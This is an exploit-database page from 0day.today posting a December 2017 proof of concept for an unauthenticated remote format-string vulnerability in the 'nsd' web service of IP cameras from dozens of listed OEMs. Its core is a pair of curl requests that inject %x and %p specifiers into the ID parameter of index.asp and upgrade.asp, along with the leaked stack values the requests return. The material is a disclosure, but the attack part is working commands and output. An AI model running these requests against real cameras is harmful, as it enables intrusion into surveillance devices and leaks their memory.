0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Multiple OEM - nsd Remote Stack Format String (PoC)
[[STX]
Subject: Remote Stack Format String in 'nsd' binary from multiple OEM
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 14, 2017
Full Disclosure: 0-Day
-[ PoC ]-
1)
$ curl 'http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB'
[...]
function initHideWidget(){
document.getElementById("devip").value = "192.168.57.20";
document.getElementById("cameraid").value = 1;
document.getElementById("streamid").value = 1;
document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069";
document.getElementById("lg").value = "BBBB";
document.getElementById("port").value = 60000;
document.getElementById("ipver").value = 1;
document.getElementById("tprotocol").value = 2;
document.getElementById("devtype").value = 1;
document.getElementById("ismotorize").value = 1;
[...]
Note: 'BBBB' are hiding within '5e3006db'
2)
curl -v "http://[IP:PORT]/Maintain/upgrade.asp?ID=|%p|%p|%p|%p|%p|%p"
[...]
function initHideWidget(){
document.getElementById("ip").value = "192.168.57.20";
document.getElementById("id").value = "|0x5d300484|0xffffffff|0xea60|0x1|0x2|0x1";
document.getElementById("port").value = 60000;
document.getElementById("ipver").value = 1;
document.getElementById("tprotocol").value = 2;
document.getElementById("devtype").value = 1;
[...]
-[ Affected OEM ]-
Huatu
I-View
IP Camera Web Service
Stanley Security
3D Eyes CCTV Platform
Protech Srl
LS vision
GWSECU
12 Legion Solution
HDVuk IP Camera
Intervid Security
Suzuki Tech
Wellsite IP Camera
iBrido
Protec IP Camera
Maxtron IP Camera
Ascendent
GTvs IP Camera
Squilla
Bikal IP Camera
MW Power
Alfa Vision
KMA Security
Tough Dog Security
Kpro HQ
Lanetwork
AFM Vision
ZetaDo
Jobsight Inc.
Datalab IP Technologies
4Tvision
Proline UK
Tanz
Aisonic
HD-IP
PreSec Security Solution
EagleVision
Elemis Delta
Imenara
Gigamedia
Xavee
Honeywell
Boss Security
A.R.T Surveillance
Global Security
Securicorp
Securetech
Vapplica
Star
Stic
NeXus
Alnet
Spy Smart
Kompsos
Adler Security Systems
Nextan
Access
Toprotect
Kawah
LS StrateX
Senpei CCTV
Metcom
AFM Vision
Doron Technologies
Saviour Smart IoT Systems
Eagle-Eye
Faucon.at
BlueEagle Security
Campro
Opple
Level One
Video and Monitor System
K&D
[ETX]
# 0day.today [2024-11-15] #